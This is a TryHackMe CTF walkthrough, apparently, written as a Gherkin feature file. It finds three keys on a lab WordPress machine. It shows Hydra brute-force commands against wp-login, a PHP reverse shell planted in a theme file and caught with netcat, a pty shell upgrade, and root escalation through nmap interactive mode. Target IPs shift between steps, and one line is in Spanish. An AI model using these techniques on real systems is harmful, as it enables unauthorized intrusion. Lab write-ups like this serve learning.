## Version 2.0
## language: en

Feature:

  Site:
    TryHackMe
  Category:
    CTF
  User:
    julian9816
  Goal:
    There are 3 hidden keys located on the machine, can you find them?

  Background:
  Hacker's software:
    | <Software name> |  <Version>  |
    |  Windows 10 pro |  10.0.18362 |
    |      Brave      |    1.976    |
    |      Python     |     3.7     |
    |     dirsearch   |    0.3.9    |
    |     Hydra       |     9.1     |
    |     Netcat      |     1.11    |
    |     nmap        |      7.8    |
  Machine information:
    Given I am accessing the 10.10.163.196 through a VPN
    And is running on port 80

  Scenario: Success : Find the three keys in web-server
    Given I opened te following url
    """
    http://10.10.163.196
    """
    And I execute dirsearch.py
    """
    python dirsearch.py -u http://10.10.16.229 -e php
    """
    Then I obtain the following directories
    """
    [15:49:37] 200 - 41B-/robots.txt
    [15:58:23] 200 - 3KB-/wp-login.php
    """
    And I opened te following url
    """
    http://10.10.163.196/robots.txt
    """
    Then I obtain the following url
    """
    http://10.10.163.196/key-1-of-3.txt
    """
    And I open this url and obtain the first key
    Then I opened te following url
    """
    Vamos a iniciar sesion hack wp-login.php
    """
    And I find the username and password
    Then First i find the username
    """
    hydra -L names.txt -p 123 10.10.163.196 http-post-form
    "/wp-login.php:log=^USER^&pwd=^PWD^:Invalid username"
    """
    And I obtain a username
    """
    [80][http-post-form] host: 10.10.163.196   login: elliot   password: 123
    """
    Then Second i find the password
    """
    hydra -l elliot -P fsocity.dic 10.10.163.196 http-post-form
    "/wp-login.php:log=^USER^&pwd=^PWD^:
    The password you entered for the username"
    """
    And I obtain
    """
    [80][http-post-form]host: 10.10.163.196  login: elliot  password: ER28-0652
    """
    And I put in this information formulary login form
    """
    username: elliot
    password: ER28-0652
    """
    Then I was able to login correctly
    And I obtain administrator access to wordpress
    Then I do a reverse shell through reverse-shell-php.php
    And I put the text in reverse-shell-php.php in archive.php
    Then I opened te following url
    """
    https://10.10.250.243/wp-content/themes/twentyfifteen/archive.php
    """
    Then I open the reverse shell
    """
    nc64 -nlvp 1234
    """
    And I obtain
    """
    connect to [10.8.54.25] from (UNKNOWN) [10.10.250.243] 52272
    Linux linux 3.13.0-55-generic #94-Ubuntu SMP Thu Jun 18 00:27:10
    UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
    """
    Then I execute a command in this server
    """
    cd /home/robot
    """
    And I obtain
    """
    password.raw-md5
    """
    Then I opened te following url
    """
    https://md5hashing.net/hash/md5/c3fcd3d76192e4007dfb496cca67e13b
    """
    And I obtain
    """
    abcdefghijklmnopqrstuvwxyz
    """
    Then I this web serve i execute
    """
    python -c 'import pty; pty.spawn("/bin/bash")'
    """
    And I obtain
    """
    daemon@linux:/$
    """
    Then I login in this web server as administrator
    """
    $ su robot
    password: abcdefghijklmnopqrstuvwxyz
    """
    And I was able login as administrator in this server
    Then I open the archive key-2-of-3.txt
    And I obtain the second key
    Then I execute
    """
    nmap --interactive
    """
    And I obtein
    """
    Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
    Welcome to Interactive Mode -- press h <enter> for help
    nmap> !sh
    """
    Then I execute the commands
    """
    # cd /
    cd /
    # cd root
    cd root
    # ls
    """
    And I obtain
    """
    firstboot_done  key-3-of-3.txt
    """
    Then I open key-3-of-3.txt
    And I obtain the third key
    And I pass the challenge
